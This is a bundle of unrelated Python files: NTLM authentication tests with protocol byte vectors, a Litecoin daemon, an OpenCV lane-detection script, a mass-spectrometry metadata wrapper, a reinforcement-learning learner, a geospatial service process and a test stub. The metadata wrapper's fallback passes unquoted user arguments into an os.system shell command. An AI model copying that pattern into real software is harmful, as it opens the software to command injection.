b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
3).get_lm_challenge_response()
assert actual == expected
def test_lm_v2_response_with_server_target_info_timestamp(self):
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_target_info[AvId.MSV_AV_TIMESTAMP] = b"\x00" * 8
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
# Not in MS-NLMP, using expected value
expected = b"\x00" * 24
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
3).get_lm_challenge_response()
assert actual == expected
def test_nt_v1_response(self):
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x02\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
test_lmv1_response = b"\x98\xde\xf7\xb8\x7f\x88\xaa\x5d" \
b"\xaf\xe2\xdf\x77\x96\x88\xa1\x72" \
b"\xde\xf1\x1c\x7d\x5c\xcd\xef\x13"
expected_response = b"\x67\xc4\x30\x11\xf3\x02\x98\xa2" \
b"\xad\x35\xec\xe6\x4f\x16\x33\x1c" \
b"\x44\xbd\xbe\xd9\x27\x84\x1f\x94"
expected_exchange_key = b"\xd8\x72\x62\xb0\xcd\xe4\xb1\xcb" \
b"\x74\x99\xbe\xcc\xcd\xf1\x07\x84"
expected_target_info = None
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 1)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv1_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
def test_nt_v1_with_extended_security_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x0a\x82"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
test_lmv1_response = b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
expected_response = b"\x75\x37\xf8\x03\xae\x36\x71\x28" \
b"\xca\x45\x82\x04\xbd\xe7\xca\xf8" \
b"\x1e\x97\xed\x26\x83\x26\x72\x32"
expected_exchange_key = b"\xeb\x93\x42\x9a\x8b\xd9\x52\xf8" \
b"\xb8\x9c\x55\xb8\x7f\x47\x5e\xdc"
expected_target_info = None
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 1)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv1_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
def test_nt_v2_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
test_lmv2_response = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
expected_response = b"\x68\xcd\x0a\xb8\x51\xe5\x1c\x96" \
b"\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
expected_exchange_key = b"\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82" \
b"\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3"
expected_target_info = test_target_info
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 3)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv2_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
# The following tests are different from the Microsoft examples, they don't
# give an example of these scenarios so I have made them up
def test_nt_v2_response_no_target_info(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = None
test_lmv2_response = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
expected_response = b"\x39\x56\xf2\xe5\x69\xd9\xaf\xa3" \
b"\xac\x2d\x4f\x36\x7d\x38\xb9\xc5" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
expected_exchange_key = b"\xe3\x35\x1f\x5b\xe0\xa0\x2b\xc2" \
b"\xee\xb8\x76\x52\xf7\xe0\x77\x75"
expected_target_info = TargetInfo()
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 3)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv2_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info.pack() == expected_target_info.pack()
def test_nt_v2_response_with_timestamp_av_pair(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_target_info[AvId.MSV_AV_TIMESTAMP] = b"\x00" * 8
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
test_lmv2_response = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
expected_response = b"\x5d\xeb\xf3\x87\x1c\x28\x94\xb8" \
b"\x1f\x16\x42\x81\xed\xbf\x0b\xff" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x07\x00\x08\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x06\x00\x04\x00\x02\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
expected_exchange_key = b"\x9b\x37\x06\x8f\x99\x7a\x06\x5f" \
b"\xe9\xc7\x20\x63\x32\x88\xd4\x8f"
expected_target_info = test_target_info
expected_target_info[AvId.MSV_AV_FLAGS] = \
struct.pack("<L", AvFlags.MIC_PROVIDED)
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 3)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv2_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
|
from btc import BTCDaemon
class LTCDaemon(BTCDaemon):
name = "LTC"
DEFAULT_PORT = 5001
def load_electrum(self):
import electrum_ltc
self.electrum = electrum_ltc
if __name__ == "__main__":
daemon = LTCDaemon()
daemon.start()
|
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
# Read in and grayscale the image
image = mpimg.imread('exit-ramp.jpg')
plt.imshow(image)
plt.show()
gray = cv2.cvtColor(image,cv2.COLOR_RGB2GRAY)
plt.imshow(gray)
plt.show()
# Define a kernel size and apply Gaussian smoothing
kernel_size = 5
blur_gray = cv2.GaussianBlur(gray,(kernel_size, kernel_size),0)
plt.imshow(blur_gray)
plt.show()
# Define our parameters for Canny and apply
low_threshold = 50
high_threshold = 150
edges = cv2.Canny(blur_gray, low_threshold, high_threshold)
plt.imshow(edges)
plt.show()
# Next we'll create a masked edges image using cv2.fillPoly()
mask = np.zeros_like(edges)
ignore_mask_color = 255
# This time we are defining a four sided polygon to mask
imshape = image.shape
vertices = np.array([[(50,imshape[0]),(420, 300), (520, 300), (900,imshape[0])]], dtype=np.int32)
cv2.fillPoly(mask, vertices, ignore_mask_color)
masked_edges = cv2.bitwise_and(edges, mask)
plt.imshow(masked_edges)
plt.show()
# Define the Hough transform parameters
# Make a blank the same size as our image to draw on
rho = 1 # distance resolution in pixels of the Hough grid
theta = np.pi/180 # angular resolution in radians of the Hough grid
threshold = 2 # minimum number of votes (intersections in Hough grid cell)
min_line_length = 4 #minimum number of pixels making up a line
max_line_gap = 5 # maximum gap in pixels between connectable line segments
line_image = np.copy(image)*0 # creating a blank to draw lines on
# Run Hough on edge detected image
# Output "lines" is an array containing endpoints of detected line segments
lines = cv2.HoughLinesP(masked_edges, rho, theta, threshold, np.array([]),
min_line_length, max_line_gap)
# Iterate over the output "lines" and draw lines on a blank image
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(line_image,(x1,y1),(x2,y2),(255,0,0),10)
# Create a "color" binary image to combine with line image
color_edges = np.dstack((edges, edges, edges))
plt.imshow(color_edges)
plt.show()
# Draw the lines on the edge image
lines_edges = cv2.addWeighted(color_edges, 0.8, line_image, 1, 0)
plt.imshow(lines_edges)
plt.show()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
__all__ = [
'csl',
]
def csl(l):
return ', '.join(str(x) for x in l)
|
#!/usr/bin/env python
import sys
import json
import os
import argparse
import textwrap
import csv
import inspect
def ontology_lookup(name, table):
# takes in accession number outputs the name
filename = inspect.getframeinfo(inspect.currentframe()).filename
path = os.path.dirname(os.path.abspath(filename))
# check if correct table
if table=="role":
tablepth = os.path.join(path, 'pub_role.loc')
elif table=="status":
tablepth = os.path.join(path, 'pub_status.loc')
else:
print "Table not recognised"
return ""
with open(tablepth, "rb") as csvfile:
reader = csv.reader(csvfile, delimiter='\t')
ont_dict = dict((k, v) for v, k in reader)
try:
return ont_dict[name]
except KeyError:
return ""
def main():
p = argparse.ArgumentParser(prog='PROG',
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''DI-MS processing for DMA''',
epilog=textwrap.dedent('''\
-------------------------------------------------------------------------
'''))
p.add_argument('-inputzip', dest='inputzip', required=True)
p.add_argument('-out_dir', dest='out_dir', required=True)
p.add_argument('-html_file', dest='html_file', required=True)
p.add_argument('-study_title', dest='study_title', required=True)
p.add_argument('-jsontxt', dest='jsontxt', required=False, nargs='?')
p.add_argument('--s_submission_date', dest='s_submission_date', required=False, default="", nargs='?')
p.add_argument('--s_release_date', dest='s_release_date', required=False, default="", nargs='?')
p.add_argument('--s_description', dest='s_description', required=False, default="", nargs='?')
p.add_argument('--s_pubmed', dest='s_pubmed', required=False, default="", nargs='?')
p.add_argument('--s_pub_doi', dest='s_pub_doi', required=False, default="", nargs='?')
p.add_argument('--s_pub_status', dest='s_pub_status', required=False, default="", nargs='?')
p.add_argument('--s_pub_author', dest='s_pub_author', required=False, default="", nargs='?')
p.add_argument('--s_pub_title', dest='s_pub_title', required=False, default="", nargs='?')
p.add_argument('--s_first_name', dest='s_first_name', required=False, default="", nargs='?')
p.add_argument('--s_mid_initials', dest='s_mid_initials', required=False, default="", nargs='?')
p.add_argument('--s_last_name', dest='s_last_name', required=False, default="", nargs='?')
p.add_argument('--s_telephone', dest='s_telephone', required=False, default="", nargs='?')
p.add_argument('--s_fax', dest='s_fax', required=False, default="", nargs='?')
p.add_argument('--s_affiliation', dest='s_affiliation', required=False, default="", nargs='?')
p.add_argument('--s_role', dest='s_role', required=False, default="", nargs='?')
p.add_argument('--s_mail', dest='s_mail', required=False, default="", nargs='?')
p.add_argument('--s_address', dest='s_address', required=False, default="", nargs='?')
p.add_argument('--i_submission_date', dest='i_submission_date', required=False, default="", nargs='?')
p.add_argument('--i_release_date', dest='i_release_date', required=False, default="", nargs='?')
p.add_argument('--i_description', dest='i_description', required=False, default="", nargs='?')
p.add_argument('--i_pubmed', dest='i_pubmed', required=False, default="", nargs='?')
p.add_argument('--i_pub_doi', dest='i_pub_doi', required=False, default="", nargs='?')
p.add_argument('--i_pub_title', dest='i_pub_title', required=False, default="", nargs='?')
p.add_argument('--i_pub_status', dest='i_pub_status', required=False, default="", nargs='?')
p.add_argument('--i_pub_author', dest='i_pub_author', required=False, default="", nargs='?')
p.add_argument('--i_first_name', dest='i_first_name', required=False, default="", nargs='?')
p.add_argument('--i_mid_initials', dest='i_mid_initials', required=False, default="", nargs='?')
p.add_argument('--i_last_name', dest='i_last_name', required=False, default="", nargs='?')
p.add_argument('--i_telephone', dest='i_telephone', required=False, default="", nargs='?')
p.add_argument('--i_fax', dest='i_fax', required=False, default="", nargs='?')
p.add_argument('--i_affiliation', dest='i_affiliation', required=False, default="", nargs='?')
p.add_argument('--i_role', dest='i_role', required=False, default="", nargs='?')
p.add_argument('--i_mail', dest='i_mail', required=False, default="", nargs='?')
p.add_argument('--i_address', dest='i_address', required=False, default="", nargs='?')
p.add_argument('--organism_text', dest='organism_text', required=False, default="", nargs='?')
p.add_argument('--organism_ref', dest='organism_ref', required=False, default="", nargs='?')
p.add_argument('--organism_iri', dest='organism_iri', required=False, default="", nargs='?')
p.add_argument('--organism_part_text', dest='organism_part_text', required=False, default="", nargs='?')
p.add_argument('--organism_part_ref', dest='organism_part_ref', required=False, default="", nargs='?')
p.add_argument('--organism_part_iri', dest='organism_part_iri', required=False, default="", nargs='?')
p.add_argument('--organism_variant_text', dest='organism_variant_text', required=False, default="", nargs='?')
p.add_argument('--organism_variant_ref', dest='organism_variant_ref', required=False, default="", nargs='?')
p.add_argument('--organism_variant_iri', dest='organism_variant_iri', required=False, default="", nargs='?')
args = p.parse_args()
USERMETA = {'characteristics': {'organism': {'name': '', 'accession': '', 'ref': ''},
'organism_variant': {'name': '', 'accession': '', 'ref': ''},
'organism_part': {'name': '', 'accession': '', 'ref': ''},
},
'investigation': {'identifier': '', 'title': 'Investigation', 'description': '',
'submission_date': '', 'release_date': ''
},
'investigation_publication': {'pubmed': '', 'doi': '', 'author_list': '', 'title': '',
'status': {'name': '', 'accession': '', 'ref': 'PSO'},
},
'study': {
'title': '', 'description': '', 'submission_date': '', 'release_date': '',
},
'study_publication': {'pubmed': '', 'doi': '', 'author_list': '', 'title': '',
'status': {'name': '', 'accession': '', 'ref': 'PSO'},
},
'description': {'sample_collect': '', 'extraction': '', 'chroma': '', 'mass_spec': '',
'data_trans': '', 'metabo_id': ''
},
# Multiple Values Parameters
'study_contacts': [
{'first_name': '', 'last_name': '', 'mid': '', 'email': '',
'fax': '', 'phone': '', 'adress': '', 'affiliation': '',
'roles': {'name': '', 'accession': '', 'ref': ''},
},
],
'investigation_contacts': [
{'first_name': '', 'last_name': '', 'mid': '', 'email': '',
'fax': '', 'phone': '', 'adress': '', 'affiliation': '',
'roles': {'name': '', 'accession': '', 'ref': ''},
},
],
'Post Extraction': {'value': ''},
'Derivatization': {'value': ''},
'Chromatography Instrument': {'name': '', 'ref': '', 'accession': ''},
'Column type': {'value': ''},
'Column model': {'value': ''},
}
# check if using json file
if args.jsontxt and os.path.isfile(args.jsontxt):
with open(args.jsontxt, 'r') as f:
USERMETA = json.load(f)
else:
# Fill in USERMETA dictionary
USERMETA['characteristics']['organism']['value'] = args.organism_text
USERMETA['characteristics']['organism']['accession'] = args.organism_iri
USERMETA['characteristics']['organism']['ref'] = args.organism_ref
USERMETA['characteristics']['organism_variant']['value'] = args.organism_variant_text
USERMETA['characteristics']['organism_variant']['accession'] = args.organism_variant_iri
USERMETA['characteristics']['organism_variant']['ref'] = args.organism_variant_ref
USERMETA['characteristics']['organism_part']['value'] = args.organism_part_text
USERMETA['characteristics']['organism_part']['accession'] = args.organism_part_iri
USERMETA['characteristics']['organism_part']['ref'] = args.organism_part_ref
# USERMETA['investigation']['identifier'] = # uses study identifier
USERMETA['investigation']['description'] = args.i_description
USERMETA['investigation']['submission_date'] = args.i_submission_date
USERMETA['investigation']['release_date'] = args.i_release_date
USERMETA['investigation_publication']['pubmed'] = args.i_pubmed
USERMETA['investigation_publication']['author_list'] = args.i_pub_author
USERMETA['investigation_publication']['title'] = args.i_pub_title
USERMETA['investigation_publication']['doi'] = args.i_pub_doi
USERMETA['investigation_publication']['status']['name'] = ontology_lookup(args.i_pub_status, 'status')
USERMETA['investigation_publication']['status']['accession'] = args.i_pub_status
USERMETA['investigation_contacts'][0]['first_name'] = args.i_first_name
USERMETA['investigation_contacts'][0]['last_name'] = args.i_last_name
USERMETA['investigation_contacts'][0]['mid'] = args.i_mid_initials
USERMETA['investigation_contacts'][0]['email'] = args.i_mail
USERMETA['investigation_contacts'][0]['fax'] = args.i_fax
USERMETA['investigation_contacts'][0]['phone'] = args.i_telephone
USERMETA['investigation_contacts'][0]['adress'] = args.i_address
USERMETA['investigation_contacts'][0]['affiliation'] = args.i_affiliation
USERMETA['investigation_contacts'][0]['roles']['name'] = ontology_lookup(args.i_role, 'role')
USERMETA['investigation_contacts'][0]['roles']['accession'] = args.i_role
USERMETA['study']['title'] = args.study_title
USERMETA['study']['description'] = args.s_description
USERMETA['study']['submission_date'] = args.s_submission_date
USERMETA['study']['release_date'] = args.s_release_date
USERMETA['study_publication']['pubmed'] = args.s_pubmed
USERMETA['study_publication']['author_list'] = args.s_pub_author
USERMETA['study_publication']['title'] = args.s_pub_title
USERMETA['study_publication']['doi'] = args.s_pub_doi
USERMETA['study_publication']['status']['name'] = ontology_lookup(args.s_pub_status, 'status')
USERMETA['study_publication']['status']['accession'] = args.s_pub_status
USERMETA['study_contacts'][0]['first_name'] = args.s_first_name
USERMETA['study_contacts'][0]['last_name'] = args.s_last_name
USERMETA['study_contacts'][0]['mid'] = args.s_mid_initials
USERMETA['study_contacts'][0]['email'] = args.s_mail
USERMETA['study_contacts'][0]['fax'] = args.s_fax
USERMETA['study_contacts'][0]['phone'] = args.s_telephone
USERMETA['study_contacts'][0]['adress'] = args.s_address
USERMETA['study_contacts'][0]['affiliation'] = args.s_affiliation
USERMETA['study_contacts'][0]['roles']['name'] = ontology_lookup(args.s_role, 'role')
USERMETA['study_contacts'][0]['roles']['accession'] = args.s_role
try:
from mzml2isa.parsing import full_parse
# import progressbar as pb
# parse the files
full_parse(args.inputzip, args.out_dir, args.study_title, usermeta=USERMETA, split=True, merge=False, verbose=True,
multip=False)
except ImportError:
import tempfile
temp = tempfile.NamedTemporaryFile()
temp.write(json.dumps(USERMETA))
temp.seek(0)
os.system("mzml2isa -i %s -o %s -s %s -m %s" % (args.inputzip, args.out_dir, args.study_title, temp.name))
temp.close()
html_code = '<a href="%s/a_%s_metabolite_profiling_mass_spectrometry.txt">a_%s_metabolite_profiling_mass_spectrometry.txt</a>' \
'<br/><a href="%s/i_Investigation.txt">i_Investigation.txt</a><br/>' \
'<a href="%s/s_%s.txt">s_test.txt</a><br/>' % tuple([args.study_title] * 6)
with open(args.html_file, 'wb') as f:
f.write(html_code)
if __name__ == "__main__":
main()
|
# coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This is a modified version of the original file
"""VTrace (IMPALA) learner for Google Research Football.
"""
from absl import app
from absl import flags
from absl import logging
from seed_rl.agents.vtrace import learner
from seed_rl.common import actor
from seed_rl.common import common_flags
from seed_rl.football import env
from seed_rl.football import networks
from seed_rl.football.networks.gfootball import create_network as GFootball
from seed_rl.football.networks.gfootball_lstm import create_network as GFootballLSTM
from seed_rl.football.networks.gfootball_lite import create_network as GFootballLite
from seed_rl.football.networks.vtrace_mlp_and_lstm import create_network as VtraceMLPandLSTM
from seed_rl.football.networks.gfootball_flex import create_network as GFootballFlex
from seed_rl.football.networks.gfootball_flex20 import create_network as GFootballFlex20
from seed_rl.football.networks.gfootball_role_aware import create_network as GFootballRoleAware
import tensorflow as tf
FLAGS = flags.FLAGS
# Optimizer settings.
flags.DEFINE_float('learning_rate', 0.00048, 'Learning rate.')
KNOWN_NETWORKS = {
'GFootball': GFootball,
'GFootballLSTM': GFootballLSTM,
'GFootballLite': GFootballLite,
'GFootballFlex': GFootballFlex,
'GFootballFlex20': GFootballFlex20,
'GFootballRoleAware': GFootballRoleAware,
'VtraceMLPandLSTM': VtraceMLPandLSTM
}
def create_agent(action_space, env_observation_space,
parametric_action_distribution, extended_network_config={}):
network_config = extended_network_config.copy()
network_config['action_space'] = action_space
network_config['env_observation_space'] = env_observation_space
network_config['parametric_action_distribution'] = parametric_action_distribution
if 'network_name' in network_config:
network_name = network_config['network_name']
else:
network_name = 'GFootball'
logging.warning('WARNING: NO NETWORK NAME PROVIDED, DEFAULT WILL BE USED')
logging.info('Creating network %s with parameters: %s', network_name, str(network_config))
return KNOWN_NETWORKS[network_name](network_config)
def create_optimizer(unused_final_iteration):
learning_rate_fn = lambda iteration: FLAGS.learning_rate
optimizer = tf.keras.optimizers.Adam(FLAGS.learning_rate)
return optimizer, learning_rate_fn
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.run_mode == 'actor':
actor.actor_loop(env.create_environment)
elif FLAGS.run_mode == 'learner':
learner.learner_loop(env.create_environment,
create_agent,
create_optimizer)
else:
raise ValueError('Unsupported run mode {}'.format(FLAGS.run_mode))
if __name__ == '__main__':
app.run(main)
|
import json
import logging
import fiona
from pywps import LiteralInput, ComplexInput, ComplexOutput
from pywps import Process, FORMATS
from rasterio.crs import CRS
from shapely.geometry import shape
from raven.utils import archive_sniffer, crs_sniffer, single_file_check
from raven.utils import geom_transform, geom_prop, multipolygon_check
LOGGER = logging.getLogger("PYWPS")
class ShapePropertiesProcess(Process):
"""Given a file containing vector data, provide general information and spatial characteristics."""
def __init__(self):
inputs = [
ComplexInput('shape', 'Vector Shape',
abstract='An ESRI Shapefile, GML, GeoPackage, JSON or GeoJSON file.'
' The ESRI Shapefile must be zipped and contain the .shp, .shx, and .dbf.',
supported_formats=[FORMATS.GML, FORMATS.GEOJSON, FORMATS.SHP, FORMATS.JSON, FORMATS.ZIP],
min_occurs=1, max_occurs=1),
LiteralInput('projected_crs',
'Coordinate Reference System for area calculation (Default: EPSG:6622,'
' NAD83(CSRS) / Quebec Lambert)',
data_type='integer',
default=6622,
min_occurs=1, max_occurs=1)]
outputs = [
ComplexOutput('properties', 'Feature schemas',
abstract='Geographic representations and descriptions of shape properties: '
'centroid coordinates, area, perimeter and gravelius index.',
supported_formats=[FORMATS.JSON],
),
]
super(ShapePropertiesProcess, self).__init__(
self._handler,
identifier="shape-properties",
title="Shape Properties",
version="1.0",
abstract="Return shape area in square metres based on line boundaries of a polygonal vector file.",
metadata=[],
inputs=inputs,
outputs=outputs,
status_supported=True,
store_supported=True)
def _handler(self, request, response):
shape_url = request.inputs['shape'][0].file
projected_crs = request.inputs['projected_crs'][0].data
extensions = ['.gml', '.shp', '.gpkg', '.geojson', '.json']
vector_file = single_file_check(archive_sniffer(shape_url, working_dir=self.workdir, extensions=extensions))
shape_crs = crs_sniffer(vector_file)
try:
projection = CRS.from_epsg(projected_crs)
if projection.is_geographic:
msg = 'Desired CRS {} is geographic. ' \
'Areal analysis values will be in decimal-degree units.'.format(projection.to_epsg())
LOGGER.warning(msg)
except Exception as e:
msg = '{}: Failed to parse CRS definition. Exiting.'.format(e)
LOGGER.error(msg)
raise Exception(msg)
properties = []
try:
for i, layer_name in enumerate(fiona.listlayers(vector_file)):
with fiona.open(vector_file, 'r', crs=shape_crs, layer=i) as src:
for feature in src:
geom = shape(feature['geometry'])
multipolygon_check(geom)
transformed = geom_transform(geom, source_crs=shape_crs, target_crs=projection)
prop = {'id': feature['id']}
prop.update(feature['properties'])
prop.update(geom_prop(transformed))
# Recompute the centroid location using the original projection
prop['centroid'] = geom_prop(geom)['centroid']
properties.append(prop)
except Exception as e:
msg = '{}: Failed to extract features from shape {}'.format(e, vector_file)
LOGGER.error(msg)
raise Exception(msg)
response.outputs['properties'].data = json.dumps(properties)
return response
|
from keyfunctions import create_key
from keyfunctions import create_element_rand
import keyfunctions.globals as consts
import random
import unittest
import struct
class CoreTestSuite(unittest.TestCase):
"""Testing of core functions."""
def test_createKey(self):
key = create_key([0.2, 0.001, 0.223], 10)
